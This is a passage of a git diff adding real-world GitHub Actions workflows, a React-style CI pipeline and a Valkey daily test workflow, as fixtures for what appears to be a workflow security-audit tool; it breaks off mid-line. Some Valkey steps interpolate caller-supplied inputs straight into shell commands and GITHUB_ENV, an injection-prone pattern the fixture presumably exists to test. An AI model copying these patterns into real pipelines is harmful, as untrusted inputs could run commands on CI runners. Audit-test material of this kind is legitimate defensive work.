+ - "-r=www-modern --env=development --variant=false" + - "-r=www-modern --env=production --variant=false" + - "-r=www-modern --env=development --variant=true" + - "-r=www-modern --env=production --variant=true" + - "-r=xplat --env=development --variant=false" + - "-r=xplat --env=development --variant=true" + - "-r=xplat --env=production --variant=false" + - "-r=xplat --env=production --variant=true" + # TODO: Test more persistent configurations? 
+ - "-r=stable --env=development --persistent" + - "-r=experimental --env=development --persistent" + shard: + - 1/5 + - 2/5 + - 3/5 + - 4/5 + - 5/5 + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: | + yarn.lock + compiler/yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd compiler install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: node --version + - run: yarn test ${{ matrix.params }} --ci --shard=${{ matrix.shard }} + + # Hardcoded to improve parallelism + test-linter: + name: Test eslint-plugin-react-hooks + needs: [runtime_compiler_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: | + yarn.lock + compiler/yarn.lock + - name: Restore cached node_modules + uses: actions/cache@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + - name: Install runtime dependencies + run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Install compiler dependencies + run: yarn install --frozen-lockfile + working-directory: 
compiler + if: steps.node_modules.outputs.cache-hit != 'true' + - run: ./scripts/react-compiler/build-compiler.sh && ./scripts/react-compiler/link-compiler.sh + - run: yarn workspace eslint-plugin-react-hooks test + + # ----- BUILD ----- + build_and_lint: + name: yarn build and lint + needs: [runtime_compiler_node_modules_cache] + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + # yml is dumb. update the --total arg to yarn build if you change the number of workers + worker_id: + [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24] + release_channel: [stable, experimental] + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: | + yarn.lock + compiler/yarn.lock + - uses: actions/setup-java@v4 + with: + distribution: temurin + java-version: 11.0.22 + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. 
+ - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd compiler install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn build --index=${{ matrix.worker_id }} --total=25 --r=${{ matrix.release_channel }} --ci + env: + CI: github + RELEASE_CHANNEL: ${{ matrix.release_channel }} + NODE_INDEX: ${{ matrix.worker_id }} + - name: Lint build + run: yarn lint-build + - name: Display structure of build + run: ls -R build + - name: Archive build + uses: actions/upload-artifact@v4 + with: + name: _build_${{ matrix.worker_id }}_${{ matrix.release_channel }} + path: build + if-no-files-found: error + + test_build: + name: yarn test-build + needs: [build_and_lint, runtime_compiler_node_modules_cache] + strategy: + fail-fast: false + matrix: + test_params: [ + # Intentionally passing these as strings instead of creating a + # separate parameter per CLI argument, since it's easier to + # control/see which combinations we want to run. 
+ -r=stable --env=development, + -r=stable --env=production, + -r=experimental --env=development, + -r=experimental --env=production, + # TODO: Update test config to support www build tests + # - "-r=www-classic --env=development --variant=false" + # - "-r=www-classic --env=production --variant=false" + # - "-r=www-classic --env=development --variant=true" + # - "-r=www-classic --env=production --variant=true" + # - "-r=www-modern --env=development --variant=false" + # - "-r=www-modern --env=production --variant=false" + # - "-r=www-modern --env=development --variant=true" + # - "-r=www-modern --env=production --variant=true" + + # TODO: Update test config to support xplat build tests + # - "-r=xplat --env=development --variant=false" + # - "-r=xplat --env=development --variant=true" + # - "-r=xplat --env=production --variant=false" + # - "-r=xplat --env=production --variant=true" + + # TODO: Test more persistent configurations? + ] + shard: + - 1/10 + - 2/10 + - 3/10 + - 4/10 + - 5/10 + - 6/10 + - 7/10 + - 8/10 + - 9/10 + - 10/10 + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: | + yarn.lock + compiler/yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. 
+ - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd compiler install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - run: node --version + - run: yarn test --build ${{ matrix.test_params }} --shard=${{ matrix.shard }} --ci + + test_build_devtools: + name: yarn test-build (devtools) + needs: [build_and_lint, runtime_node_modules_cache] + strategy: + fail-fast: false + matrix: + shard: + - 1/5 + - 2/5 + - 3/5 + - 4/5 + - 5/5 + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. 
+ - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - run: node --version + - run: yarn test --build --project=devtools -r=experimental --shard=${{ matrix.shard }} --ci + + process_artifacts_combined: + name: Process artifacts combined + needs: [build_and_lint, runtime_node_modules_cache] + permissions: + # https://github.com/actions/attest-build-provenance + id-token: write + attestations: write + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. 
+ - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - run: echo ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} >> build/COMMIT_SHA + - name: Scrape warning messages + run: | + mkdir -p ./build/__test_utils__ + node ./scripts/print-warnings/print-warnings.js > build/__test_utils__/ReactAllWarnings.js + # Compress build directory into a single tarball for easy download + - run: tar -zcvf ./build.tgz ./build + # TODO: Migrate scripts to use `build` directory instead of `build2` + - run: cp ./build.tgz ./build2.tgz + - name: Archive build artifacts + id: upload_artifacts_combined + uses: actions/upload-artifact@v4 + with: + name: artifacts_combined + path: | + ./build.tgz + ./build2.tgz + if-no-files-found: error + - uses: actions/attest-build-provenance@v2 + # We don't verify builds generated from pull requests not originating from facebook/react. + # However, if the PR lands, the run on `main` will generate the attestation which can then + # be used to download a build via scripts/release/download-experimental-build.js. + # + # Note that this means that scripts/release/download-experimental-build.js must be run with + # --no-verify when downloading a build from a fork. 
+ if: github.event_name == 'push' && github.ref_name == 'main' || github.event.pull_request.head.repo.full_name == github.repository + with: + subject-name: artifacts_combined.zip + subject-digest: sha256:${{ steps.upload_artifacts_combined.outputs.artifact-digest }} + + check_error_codes: + name: Search build artifacts for unminified errors + needs: [build_and_lint, runtime_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - name: Search build artifacts for unminified errors + run: | + yarn extract-errors + git diff --exit-code || (echo "Found unminified errors. Either update the error codes map or disable error minification for the affected build, if appropriate." 
&& false) + + check_release_dependencies: + name: Check release dependencies + needs: [build_and_lint, runtime_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - run: yarn check-release-dependencies + + RELEASE_CHANNEL_stable_yarn_test_dom_fixtures: + name: Check fixtures DOM (stable) + needs: build_and_lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache@v4 # note: this does not reuse centralized cache since it has unique cache key + id: node_modules + with: + path: | + **/node_modules + key: fixtures_dom-node_modules-v6-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'fixtures/dom/yarn.lock') }} + - name: Ensure clean build directory + run: rm -rf build + - run: yarn --cwd fixtures/dom install 
--frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - name: Run DOM fixture tests + run: | + yarn predev + yarn test + working-directory: fixtures/dom + env: + RELEASE_CHANNEL: stable + + # ----- FLIGHT ----- + run_fixtures_flight_tests: + name: Run fixtures Flight tests + needs: build_and_lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + # Fixture copies some built packages from the workroot after install. + # That means dependencies of the built packages are not installed. + # We need to install dependencies of the workroot to fulfill all dependency constraints + - name: Restore cached node_modules + uses: actions/cache@v4 # note: this does not reuse centralized cache since it has unique cache key + id: node_modules + with: + path: | + **/node_modules + key: fixtures_flight-node_modules-v6-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'fixtures/flight/yarn.lock') }} + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd fixtures/flight install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Check Playwright version + id: playwright_version + run: echo "playwright_version=$(npm ls @playwright/test | grep @playwright | sed 's/.*@//' | head -1)" >> "$GITHUB_OUTPUT" + - name: Cache Playwright Browsers for version ${{ steps.playwright_version.outputs.playwright_version }} + id: cache_playwright_browsers + uses: 
actions/cache@v4 + with: + path: ~/.cache/ms-playwright + key: playwright-browsers-v6-${{ runner.arch }}-${{ runner.os }}-${{ steps.playwright_version.outputs.playwright_version }} + - name: Playwright install deps + if: steps.cache_playwright_browsers.outputs.cache-hit != 'true' + working-directory: fixtures/flight + run: npx playwright install --with-deps chromium + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - name: Run tests + working-directory: fixtures/flight + run: yarn test + env: + # Otherwise the webserver is a blackbox + DEBUG: pw:webserver + - name: Archive Flight fixture artifacts + uses: actions/upload-artifact@v4 + with: + name: flight-playwright-report + path: fixtures/flight/playwright-report + if-no-files-found: warn + - name: Archive Flight fixture artifacts + uses: actions/upload-artifact@v4 + with: + name: flight-test-results + path: fixtures/flight/test-results + if-no-files-found: ignore + + # ----- DEVTOOLS ----- + build_devtools_and_process_artifacts: + name: Build DevTools and process artifacts + needs: [build_and_lint, runtime_node_modules_cache] + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + browser: [chrome, firefox, edge] + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. 
+ - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - run: ./scripts/ci/pack_and_store_devtools_artifacts.sh ${{ matrix.browser }} + env: + RELEASE_CHANNEL: experimental + - name: Display structure of build + run: ls -R build + # Simplifies getting the extension for local testing + - name: Archive ${{ matrix.browser }} extension + uses: actions/upload-artifact@v4 + with: + name: react-devtools-${{ matrix.browser }}-extension + path: build/devtools/${{ matrix.browser }}-extension.zip + if-no-files-found: error + - name: Archive ${{ matrix.browser }} metadata + uses: actions/upload-artifact@v4 + with: + name: react-devtools-${{ matrix.browser }}-metadata + path: build/devtools/webpack-stats.*.json + + merge_devtools_artifacts: + name: Merge DevTools artifacts + needs: build_devtools_and_process_artifacts + runs-on: ubuntu-latest + steps: + - name: Merge artifacts + uses: actions/upload-artifact/merge@v4 + with: + name: react-devtools + pattern: react-devtools-* + + run_devtools_e2e_tests: + name: Run DevTools e2e tests + needs: [build_and_lint, runtime_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. 
+ - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Check Playwright version + id: playwright_version + run: echo "playwright_version=$(npm ls @playwright/test | grep @playwright | sed 's/.*@//' | head -1)" >> "$GITHUB_OUTPUT" + - name: Cache Playwright Browsers for version ${{ steps.playwright_version.outputs.playwright_version }} + id: cache_playwright_browsers + uses: actions/cache@v4 + with: + path: ~/.cache/ms-playwright + key: playwright-browsers-v6-${{ runner.arch }}-${{ runner.os }}-${{ steps.playwright_version.outputs.playwright_version }} + - name: Playwright install deps + if: steps.cache_playwright_browsers.outputs.cache-hit != 'true' + run: npx playwright install --with-deps chromium + - run: ./scripts/ci/run_devtools_e2e_tests.js + env: + RELEASE_CHANNEL: experimental + - name: Archive Playwright report + uses: actions/upload-artifact@v4 + with: + name: devtools-playwright-artifacts + path: tmp/playwright-artifacts + if-no-files-found: warn + + # ----- SIZEBOT ----- + sizebot: + if: ${{ github.event_name == 'pull_request' && github.ref_name != 'main' && github.event.pull_request.base.ref == 'main' }} + name: Run sizebot + needs: [build_and_lint] + permissions: + # We use github.token to download the build artifact from a previous runtime_build_and_test.yml run + actions: read + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache@v4 # note: this does not reuse centralized cache since 
it has unique cache key + id: node_modules + with: + path: | + **/node_modules + key: runtime-release-node_modules-v6-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'scripts/release/yarn.lock') }} + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd scripts/release install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Download artifacts for base revision + # The build could have been generated from a fork, so we must download the build without + # any verification. This is safe since we only use this for sizebot calculation and the + # unverified artifact is not used. Additionally this workflow runs in the pull_request + # trigger so only restricted permissions are available. + run: | + GH_TOKEN=${{ github.token }} scripts/release/download-experimental-build.js --commit=$(git rev-parse ${{ github.event.pull_request.base.sha }}) ${{ (github.event.pull_request.head.repo.full_name != github.repository && '--noVerify') || ''}} + mv ./build ./base-build + - name: Delete extraneous files + # TODO: The `download-experimental-build` script copies the npm + # packages into the `node_modules` directory. This is a historical + # quirk of how the release script works. Let's pretend they + # don't exist. 
+ run: rm -rf ./base-build/node_modules + - name: Display structure of base-build from origin/main + run: ls -R base-build + - name: Ensure clean build directory + run: rm -rf build + - name: Restore archived build for PR + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Scrape warning messages + run: | + mkdir -p ./build/__test_utils__ + node ./scripts/print-warnings/print-warnings.js > build/__test_utils__/ReactAllWarnings.js + - name: Display structure of build for PR + run: ls -R build + - run: echo ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} >> build/COMMIT_SHA + - run: node ./scripts/tasks/danger + - name: Archive sizebot results + uses: actions/upload-artifact@v4 + with: + name: sizebot-message + path: sizebot-message.md + if-no-files-found: ignore diff --git a/test-fixtures/workflow-audits/real-cases/RC-07-workflow-call-boundary/.github/workflows/daily.yml b/test-fixtures/workflow-audits/real-cases/RC-07-workflow-call-boundary/.github/workflows/daily.yml new file mode 100644 index 0000000..70e0cc2 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-07-workflow-call-boundary/.github/workflows/daily.yml @@ -0,0 +1,1984 @@ +name: Daily +on: + pull_request: + types: [opened, synchronize, reopened, labeled] + branches: + # any PR to a release branch. 
+ - "[0-9].[0-9]" + - "unstable" + paths-ignore: + - "**/*.md" + - "**/00-RELEASENOTES" + - "**/COPYING" + schedule: + - cron: "0 0 * * *" + workflow_dispatch: + inputs: + skipjobs: + description: "jobs to skip (delete the ones you wanna keep, do not leave empty)" + default: "valgrind,sanitizer,tls,freebsd,macos,alpine,32bit,iothreads,ubuntu,rpm-distros,malloc,specific,fortify,reply-schema,arm,lttng" + skiptests: + description: "tests to skip (delete the ones you wanna keep, do not leave empty)" + default: "valkey,modules,sentinel,cluster,unittest,large-memory" + test_args: + description: "extra test arguments" + default: "" + cluster_test_args: + description: "extra cluster / sentinel test arguments" + default: "" + use_repo: + description: "repo owner and name" + default: "valkey-io/valkey" + use_git_ref: + description: "git branch or sha to use" + default: "unstable" + workflow_call: + inputs: + skipjobs: + description: "jobs to skip (delete the ones you wanna keep, do not leave empty)" + required: false + type: string + default: "" + skiptests: + description: "tests to skip (delete the ones you wanna keep, do not leave empty)" + required: false + type: string + default: "" + test_args: + description: "extra test arguments" + required: false + type: string + default: "" + cluster_test_args: + description: "extra cluster / sentinel test arguments" + required: false + type: string + default: "" + use_repo: + description: "repo owner and name" + required: false + type: string + default: "valkey-io/valkey" + use_git_ref: + description: "git branch or sha to use" + required: false + type: string + default: "unstable" +concurrency: + group: daily-${{ github.head_ref || inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + cancel-in-progress: ${{ github.event_name != 'pull_request' || github.event.action != 'labeled' }} +permissions: + contents: read + pull-requests: read +jobs: + test-ubuntu-jemalloc: + runs-on: ubuntu-latest + # pull_request gate 
breakdown: + # 1) (base != unstable) OR PR currently has run-extra-tests. + # 2) Exclude all labeled events, except unstable + newly added run-extra-tests. + # 3) release branches run on opened/reopened/synchronize, never label-only events. + # 4) unstable runs when run-extra-tests is added, and on later code updates while it remains. + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'ubuntu') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo 
make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate + fi + - name: install Redis OSS 6.2 server for compatibility testing + run: | + cd tests/tmp + wget https://download.redis.io/releases/redis-6.2.14.tar.gz + tar -xvf redis-6.2.14.tar.gz + - name: make Redis OSS 6.2 server + run: | + cd tests/tmp/redis-6.2.14 + make + - name: backward compatibility tests with OSS Redis 6.2 + run: | + sudo apt-get install tcl8.6 tclx + ./runtest --verbose --tags compatible-redis --dump-logs --other-server-path tests/tmp/redis-6.2.14/src/redis-server + - name: install Redis OSS 7.0 server for compatibility testing + run: | + cd tests/tmp + wget https://download.redis.io/releases/redis-7.0.15.tar.gz + tar -xvf redis-7.0.15.tar.gz + - name: make Redis OSS 7.0 server + run: | + cd tests/tmp/redis-7.0.15 + make + - name: 
backward compatibility tests with OSS Redis 7.0 + run: | + sudo apt-get install tcl8.6 tclx + ./runtest --verbose --tags compatible-redis --dump-logs --other-server-path tests/tmp/redis-7.0.15/src/redis-server + test-ubuntu-arm: + runs-on: ubuntu-24.04-arm + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + (!contains(github.event.inputs.skipjobs, 'ubuntu') || !contains(github.event.inputs.skipjobs, 'arm')) + timeout-minutes: 14400 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: 
Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate + fi + test-ubuntu-jemalloc-fortify: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 